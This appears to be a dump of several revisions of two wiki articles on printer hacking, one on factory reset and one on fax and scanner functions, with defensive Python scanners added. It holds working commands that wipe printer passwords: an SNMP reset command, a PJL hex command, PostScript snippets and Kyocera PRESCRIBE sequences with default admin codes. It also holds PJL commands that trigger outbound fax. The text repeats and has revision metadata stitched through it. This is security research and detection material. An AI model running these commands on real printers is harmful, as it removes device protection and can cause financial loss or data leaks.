This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
== PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! 
KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PRESCRIBE commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- e6dfc81fdd0ca8c6db487adfba7d4f3d86d0737f 142 137 2017-01-15T15:39:56Z 92.227.58.56 0 /* PRESCRIBE */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. 
This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
== PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! 
KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- dc2b44fd8377d63bb214a225145548fb5144f2e3 137 134 2017-01-14T20:02:41Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. 
This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
== PostScript ==

PostScript offers a similar feature: the ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer, on the other hand, can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment, but this requires a [[Credential disclosure|valid password]]; likewise, ''setsystemparams'' is guarded by the PostScript system password, so the snippet below relies on that password being left at its default. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]], which forces the user to manually restart the device; with ''FactoryDefaults'' set beforehand, that power-on reverts the nonvolatile parameters and thus resets the PostScript password.

Reset PostScript system parameters to factory defaults:

<syntaxhighlight lang=postscript>
<< /FactoryDefaults true >> setsystemparams
</syntaxhighlight>

Restart the PostScript interpreter and virtual memory:

<syntaxhighlight lang=postscript>
true 0 startjob systemdict /quit get exec
</syntaxhighlight>

'''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]:

 ./pret.py -q printer ps
 Connection to printer established
 
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> reset
 printer:/> restart

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PRESCRIBE ==

For Kyocera devices, the PRESCRIBE page description language may be used to reset the device to factory defaults from within ordinary print jobs using one of the commands shown below:

<!-- may need to authorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; -->
 !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password";
 !R! ACNT "REST"; CMMT "Reset account code admin password";
 !R! EGRE; CMMT "Reset the engine board to factory defaults";
 !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings";

'''How to test for this attack?''' Open a raw network connection (using netcat, for example) to port 9100/tcp of the printer and send the commands above.

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
----
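Since every reset primitive on this page (the PML/PJL command, the two PostScript snippets and the PRESCRIBE sequences) travels inside an ordinary print job, a print server or network sensor sitting in front of the printer can look for them. The scanner below is an added example (not code from this wiki or from PRET) that does exactly that over a raw job such as a port 9100 capture or a spool file; the sample jobs at the bottom are constructed for the example. The patterns match the literal forms shown above only: PostScript can assemble the same operators at run time, so a clean result means ‘nothing obvious’, not ‘benign’.

```python
"""Flag print jobs carrying the reset/restart primitives from the page above.

Added example, not code from the Hacking Printers wiki or from PRET.
Signatures match the literal command forms quoted on the page; sample jobs
are constructed, not captured from real devices.
"""
import re

# RFC 3805 prtGeneralReset values, keyed by the last byte of the PML SetRequest
PRT_GENERAL_RESET = {4: "powerCycleReset", 5: "resetToNVRAM", 6: "resetToFactoryDefaults"}

SIGNATURES = [
    # HP: SNMP prtGeneralReset smuggled in as PML inside a PJL job
    ("pjl-pml-prtGeneralReset",
     re.compile(rb'@PJL\s+DMCMD\s+ASCIIHEX\s*=\s*"0400060205010103010401(0[456])"', re.I)),
    # PostScript: nonvolatile parameters revert at the next power-on
    ("ps-FactoryDefaults",
     re.compile(rb'/FactoryDefaults\s+true\s*>>\s*setsystemparams')),
    # PostScript: restart of interpreter and VM (needs the password, still worth logging)
    ("ps-restart-interpreter",
     re.compile(rb'\bstartjob\b[\s\S]{0,200}?systemdict\s*/quit\s+get\s+exec')),
    # Kyocera PRESCRIBE sequences
    ("prescribe-admin-password-change",
     re.compile(rb'!R!\s*KSUS\s+"AUIO"\s*,\s*"CUSTOM:Admin Password')),
    ("prescribe-ACNT-REST", re.compile(rb'!R!\s*ACNT\s+"REST"\s*;')),
    ("prescribe-EGRE", re.compile(rb'!R!\s*EGRE\s*;')),
    ("prescribe-SIOP-RESET", re.compile(rb'!R!\s*SIOP\s*0\s*,\s*"RESET:0"\s*;')),
]


def scan_job(job: bytes) -> list:
    """Names of reset primitives found in a raw print job, in order of appearance.
    PML hits are suffixed with the decoded prtGeneralReset value name."""
    hits = []
    for name, pattern in SIGNATURES:
        for m in pattern.finditer(job):
            if name == "pjl-pml-prtGeneralReset":
                value = int(m.group(1), 16)
                hits.append((m.start(), "%s:%s" % (name, PRT_GENERAL_RESET[value])))
            else:
                hits.append((m.start(), name))
    return [name for _, name in sorted(hits)]


# Constructed sample jobs (not captured from real devices)
UEL = b"\x1b%-12345X"
SAMPLE_BENIGN = (UEL + b"@PJL\r\n@PJL SET COPIES=1\r\n@PJL ENTER LANGUAGE=PCL\r\n"
                 + b"\x1bEHello, world\x0c" + UEL)
SAMPLE_HP_RESET = UEL + b'@PJL\r\n@PJL DMCMD ASCIIHEX="040006020501010301040106"\r\n' + UEL
SAMPLE_PS_RESET = b"%!PS\n<</FactoryDefaults true>> setsystemparams\n"
SAMPLE_PS_RESTART = b"%!PS\ntrue 0 startjob\nsystemdict /quit get exec\n"
SAMPLE_PRESCRIBE = (b'!R! KSUS "AUIO", "CUSTOM:Admin Password = \'admin00\'"; CMMT "drop security";\n'
                    b'!R! ACNT "REST"; CMMT "reset admin password";\n'
                    b'!R! EGRE; CMMT "engine reset";\n'
                    b'!R! SIOP0,"RESET:0"; CMMT "config reset";\n')

if __name__ == "__main__":
    for label, sample in [("benign", SAMPLE_BENIGN), ("hp", SAMPLE_HP_RESET),
                          ("ps-reset", SAMPLE_PS_RESET), ("ps-restart", SAMPLE_PS_RESTART),
                          ("prescribe", SAMPLE_PRESCRIBE)]:
        print(label, scan_job(sample))
```

Run it over whatever your print server spools before forwarding to the device; the PML signature is the only one that also tells you which of the three reset variants was requested.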
Fax and Scanner (revision 119, 2017-01-14T18:30:12Z, Admin)

While single function printers are still common, there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. Access to such functionality is interesting for an attacker because it means more sources from which to gain sensitive information and extended capabilities like access to phone lines.

== Telefax ==

Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device reachable over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the mid-1990s Adobe introduced ‘PostScript fax’ as a language supplement <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 18-35</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use the ordinary telephone system as a channel to deploy malicious PostScript code to a printer. PostScript fax, however, never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like [https://en.wikipedia.org/wiki/TIFF#TIFF_Compression_Tag TIFF].
Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to receive arbitrary PDL datastreams '''inbound''' instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFP's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling a premium-rate number such as 0900 (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Vendor-specific examples to send fax via PDL datastreams are given below.

=== HP ===
According to [http://hplipopensource.com], fax can be accessed using PML on HP devices.

=== Xerox ===
According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code>

=== Brother ===
According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code>

=== Lexmark ===
According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf], Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code>

=== Kyocera ===
According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl], Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code>

=== Ricoh ===
According to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1], Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code>

'''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the fax function.

'''Who can perform this attack?''' Potentially anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
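Because the outbound fax commands listed above are plain PJL (or, for Brother, an escape sequence) inside the job, a print server can extract the dialled number and enforce a policy before the job reaches the MFP. The script below is an added example (not code from this wiki or from any vendor) doing that for the Xerox, Lexmark, Kyocera and Brother forms. The exact spelling of the Brother <code>DIALNUM[...]</code> form and the number formats are assumptions filled in from the placeholders above, the sample jobs are constructed, and the denied prefixes (German 0900/0137, US 1-900, and 00 for international) are an illustrative policy rather than a complete list for any country.

```python
"""Extract fax destinations from raw print jobs and check them against a policy.

Added example, not code from the Hacking Printers wiki or from a vendor.
Assumptions: number syntax inside each command, the Brother bracket form,
and the prefix list. Sample jobs are constructed.
"""
import re

ESC = b"\x1b"
UEL = ESC + b"%-12345X"

# (vendor, pattern capturing the dialled number) for the command forms listed on the page
FAX_COMMANDS = [
    ("xerox",   re.compile(rb'@PJL\s+COMMENT\s+OID_ATT_FAX_DESTINATION_PHONE\s+"([^"]*)"', re.I)),
    ("lexmark", re.compile(rb'@PJL\s+LFAX\s+PHONENUMBER\s*=\s*"([^"]*)"', re.I)),
    ("kyocera", re.compile(rb'@PJL\s+SET\s+FAXTEL\s*=\s*"?([^"\r\n]+)', re.I)),
    ("brother", re.compile(ESC + rb'DIALNUM\[\s*([^\]]*?)\s*\]')),  # assumed <Esc>DIALNUM[...] layout
]

# Illustrative deny list (assumption): DE premium-rate, DE mass-call, US premium-rate, international
DENIED_PREFIXES = ("0900", "0137", "1900", "00")


def normalise(number: bytes) -> str:
    """Digits only: PJL strings may carry spaces, dashes or dial pauses."""
    return re.sub(r"\D", "", number.decode("ascii", "replace"))


def extract_fax_destinations(job: bytes) -> list:
    """[(vendor, digits)] for every outbound fax instruction found in the job."""
    found = []
    for vendor, pattern in FAX_COMMANDS:
        for m in pattern.finditer(job):
            digits = normalise(m.group(1))
            if digits:
                found.append((vendor, digits))
    return found


def policy_violations(job: bytes, denied=DENIED_PREFIXES) -> list:
    """Destinations whose digits start with a denied prefix."""
    return [(v, n) for v, n in extract_fax_destinations(job) if n.startswith(denied)]


# Constructed sample jobs (not captured from real devices)
SAMPLE_LEXMARK_OK = UEL + b'@PJL\r\n@PJL LFAX PHONENUMBER="0221 123456"\r\n@PJL ENTER LANGUAGE=PCL\r\n' + UEL
SAMPLE_XEROX_PREMIUM = UEL + b'@PJL\r\n@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "0900-555-0100"\r\n' + UEL
SAMPLE_KYOCERA_INTL = UEL + b'@PJL\r\n@PJL SET FAXTEL = 0049 221 123456\r\n' + UEL
SAMPLE_BROTHER_PREMIUM = ESC + b"DIALNUM[ 1900 555 0100 ]"

if __name__ == "__main__":
    for label, sample in [("lexmark", SAMPLE_LEXMARK_OK), ("xerox", SAMPLE_XEROX_PREMIUM),
                          ("kyocera", SAMPLE_KYOCERA_INTL), ("brother", SAMPLE_BROTHER_PREMIUM)]:
        print(label, extract_fax_destinations(sample), "violations:", policy_violations(sample))
```

A print server that already strips or rewrites PJL headers (as the accounting setups discussed elsewhere in this wiki do) is the natural place to hook this in; note that it only sees what the job declares, so the HP/PML path, which is binary, needs its own decoder.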
== Scanner ==

Access to scan functionality on MFPs is not standardized and it seems only few vendors use PJL commands for this task. Public documentation is missing; however, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator ''_brpdfscan'' may possibly be used.

'''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the scan function.

'''Who can perform this attack?'''
* Anyone who can print, if scanning functionality can be accessed through a [[Fundamentals#Printer_Control_Languages|printer control]] or [[Fundamentals#Page_Description_Languages|page description]] language
* Anyone who can access the web interface, on MFPs where documents can be scanned using the web interface
* Only attackers who can access certain network services, if a separate TCP port is used for scanning
----
]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 521a7d031dc1464ddbf808c2eed92b3d3b5eaab3 37 36 2017-01-05T11:18:59Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. 
This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) 
]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanners == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. c2f27d09b607be65ba00bd3cb5114471b5fe64b8 36 35 2017-01-05T11:18:09Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. 
This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) 
]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 521a7d031dc1464ddbf808c2eed92b3d3b5eaab3 35 34 2017-01-05T11:17:39Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to '''inbound''' receive PostScript files directly via fax. 
This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) 
